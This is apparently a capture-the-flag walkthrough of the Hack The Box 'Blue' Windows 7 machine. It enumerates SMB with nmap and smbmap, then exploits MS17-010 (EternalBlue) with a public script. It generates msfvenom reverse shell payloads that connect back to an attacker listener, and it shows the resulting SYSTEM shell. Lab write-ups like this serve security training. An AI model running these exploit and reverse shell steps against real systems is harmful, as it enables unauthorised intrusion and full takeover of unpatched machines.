HTB - Blue

Blue

About the Box:

OS Name:        Microsoft Windows 7 Professional
OS Version:     6.1.7601 Service Pack 1 Build 7601
IP:             10.10.10.40
Arch:           x64-based PC
Difficulty:     Easy

Getting Root:

1. Discovered smb ports are opened

2. Check for smb vulnerabilities and discovered it was vulnerable to MS17-010

3. Used a python exploit from github

4. Get a shell with system privileges

Nmap

Quick scan

# nmap 10.10.10.40

Host is up (0.045s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Enumerating versions and execute default scripts

 # Command
 nmap -Pn -sC -sV -p 135,139,445,49152,49153,49154,49155,49156,49157 -oN Blue_nmap.txt 10.10.10.40 
 
# Results
Nmap scan report for 10.10.10.40
Host is up (0.046s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)  
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 53s, deviation: 0s, median: 52s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-01-20T17:22:24+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-20T17:22:26
|_  start_date: 2020-01-19T23:53:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 20 12:21:39 2020 -- 1 IP address (1 host up) scanned in 69.89 seconds
 

Nmap - smb vuln script

Nmap shows the target is vulnerable to MS-17-010

root@kdeali:~/HackTheBox/Blue# nmap --script vuln -p 139,445  10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 17:17 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.40
Host is up (0.045s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/  
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 51.69 seconds

smbmap

Checking smp shares without username, we get nothing

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment   
        ----                                                    -----------     -------
[!] Access Denied

Checking smb shares specifying a username (I used "nobody12") and we got something

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12"
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share  
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY

The same results can be obtained by using -u " " (I prefer to specify a user)

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u " "
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share  
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY

Checking the files recursively with -R to check for interesting files we read.

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12" -R
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .\
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY
        .\
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        -r--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        .\Default\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    AppData
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Desktop
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Documents
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Downloads
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Favorites
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Links
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Music
        -r--r--r--           262144 Sun Jul 16 16:22:24 2017    NTUSER.DAT
        -r--r--r--             1024 Fri Jul 14 18:32:24 2017    NTUSER.DAT.LOG
        -r--r--r--           189440 Sun Jul 16 16:22:24 2017    NTUSER.DAT.LOG1
        -r--r--r--                0 Fri Jul 14 18:37:45 2017    NTUSER.DAT.LOG2
        -r--r--r--            65536 Fri Jul 14 18:32:24 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
        -r--r--r--           524288 Fri Jul 14 18:32:24 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms  
        -r--r--r--           524288 Fri Jul 14 18:32:23 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Pictures
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Saved Games
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Videos
        .\Default\AppData\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Local
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Roaming
        .\Default\AppData\Local\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Microsoft
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Temp
        .\Default\AppData\Local\Microsoft\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Windows
        .\Default\AppData\Local\Microsoft\Windows\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    GameExplorer
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    History
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Temporary Internet Files
        .\Default\AppData\Roaming\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Media Center Programs
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Microsoft
        .\Default\AppData\Roaming\Microsoft\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Internet Explorer
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Windows
        .\Default\AppData\Roaming\Microsoft\Internet Explorer\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Quick Launch
        .\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              146 Fri Jul 14 18:32:24 2017    desktop.ini
        -r--r--r--              290 Fri Jul 14 18:32:24 2017    Shows Desktop.lnk
        -r--r--r--              272 Fri Jul 14 18:32:24 2017    Window Switcher.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Cookies
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Network Shortcuts
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Printer Shortcuts
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Recent
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    SendTo
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Start Menu
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Templates
        .\Default\AppData\Roaming\Microsoft\Windows\SendTo\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--                3 Fri Jul 14 18:32:24 2017    Compressed (zipped) Folder.ZFSendToTarget
        -r--r--r--                7 Fri Jul 14 18:32:24 2017    Desktop (create shortcut).DeskLink
        -r--r--r--              558 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1238 Fri Jul 14 18:32:24 2017    Fax Recipient.lnk
        -r--r--r--                4 Fri Jul 14 18:32:24 2017    Mail Recipient.MAPIMail
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Programs
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Accessories
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Maintenance
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Accessibility
        -r--r--r--             1280 Fri Jul 14 18:32:24 2017    Command Prompt.lnk
        -r--r--r--              678 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1304 Fri Jul 14 18:32:24 2017    Notepad.lnk
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Run.lnk
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    System Tools
        -r--r--r--             1228 Fri Jul 14 18:32:24 2017    Windows Explorer.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              704 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1358 Fri Jul 14 18:32:24 2017    Ease of Access.lnk
        -r--r--r--             1258 Fri Jul 14 18:32:24 2017    Magnify.lnk
        -r--r--r--             1262 Fri Jul 14 18:32:24 2017    Narrator.lnk
        -r--r--r--             1250 Fri Jul 14 18:32:24 2017    On-Screen Keyboard.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    computer.lnk
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Control Panel.lnk
        -r--r--r--              592 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1306 Fri Jul 14 18:32:24 2017    Private Character Editor.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              318 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Help.lnk
        .\Public\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              174 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Documents
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Downloads
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Favorites
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Libraries
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Music
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Pictures
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Recorded TV
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Videos
        .\Public\Documents\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              278 Fri Jul 21 02:40:38 2017    desktop.ini
        .\Public\Downloads\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              174 Fri Jul 21 02:40:38 2017    desktop.ini
        .\Public\Libraries\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--               88 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--              876 Fri Jul 21 02:40:38 2017    RecordedTV.library-ms
        .\Public\Music\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Music
        .\Public\Music\Sample Music\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              586 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--          8414449 Fri Jul 21 02:40:38 2017    Kalimba.mp3
        -r--r--r--          4113874 Fri Jul 21 02:40:38 2017    Maid with the Flaxen Hair.mp3
        -r--r--r--          4842585 Fri Jul 21 02:40:38 2017    Sleep Away.mp3
        .\Public\Pictures\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Pictures
        .\Public\Pictures\Sample Pictures\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--           879394 Fri Jul 21 02:40:38 2017    Chrysanthemum.jpg
        -r--r--r--           845941 Fri Jul 21 02:40:38 2017    Desert.jpg
        -r--r--r--             1120 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--           595284 Fri Jul 21 02:40:38 2017    Hydrangeas.jpg
        -r--r--r--           775702 Fri Jul 21 02:40:38 2017    Jellyfish.jpg
        -r--r--r--           780831 Fri Jul 21 02:40:38 2017    Koala.jpg
        -r--r--r--           561276 Fri Jul 21 02:40:38 2017    Lighthouse.jpg
        -r--r--r--           777835 Fri Jul 21 02:40:38 2017    Penguins.jpg
        -r--r--r--           620888 Fri Jul 21 02:40:38 2017    Tulips.jpg
        .\Public\Recorded TV\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--               80 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Media
        .\Public\Recorded TV\Sample Media\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              171 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--          9699328 Fri Jul 21 02:40:38 2017    win7_scenic-demoshort_raw.wtv
        .\Public\Videos\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Videos
        .\Public\Videos\Sample Videos\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              326 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--         26246026 Fri Jul 21 02:40:38 2017    Wildlife.wmv

Exploiting - MS17-010 Manually

Github: https://github.com/3ndG4me/AutoBlue-MS17-010

Run the shell_prep.sh script and it will generate the payloads for x86 and x64

root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.19
LPORT you want x64 to listen on:
8123
LPORT you want x86 to listen on:
8124
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8123    
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8124
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE
root@kdeali:/opt/AutoBlue-MS17-010/shellcode#


# These are the files generated
root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ls -l
total 80
-rw-r--r-- 1 root root 20305 Jan  8 14:39 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Jan  8 14:39 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Jan  8 14:39 eternalblue_sc_merge.py
-rw-r--r-- 1 root root  2203 Feb  7 17:27 sc_all.bin
-rw-r--r-- 1 root root  1232 Feb  7 17:27 sc_x64.bin
-rw-r--r-- 1 root root   772 Feb  7 17:26 sc_x64_kernel.bin
-rw-r--r-- 1 root root   460 Feb  7 17:27 sc_x64_msf.bin
-rw-r--r-- 1 root root   962 Feb  7 17:27 sc_x86.bin
-rw-r--r-- 1 root root   638 Feb  7 17:26 sc_x86_kernel.bin
-rw-r--r-- 1 root root   324 Feb  7 17:27 sc_x86_msf.bin
-rwxr-xr-x 1 root root  4556 Jan  8 14:39 shell_prep.sh


# The sc_all.bin is the file you need!!!

Start the listener

# Port to get shell if x86
nc -lnvp 8123

and 

# Port to get shell if x64
nc -lnvp 8124

Execute the exploit

# Run it wihtout arguments to see the usage:
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py
eternalblue_exploit7.py <ip> <shellcode_file> [numGroomConn]

# Execute the exploit
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin   
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

We got a shell with system privileges

root@kdeali:~/HackTheBox/Blue# nc -lnvp 8123
listening on [any] 8123 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::d9ea:9b4b:ca07:c644
   Temporary IPv6 Address. . . . . . : dead:beef::c1a3:4567:bd9d:edd4
   Link-local IPv6 Address . . . . . : fe80::d9ea:9b4b:ca07:c644%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:3982%11
                                       10.10.10.2

Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

C:\Windows\system32>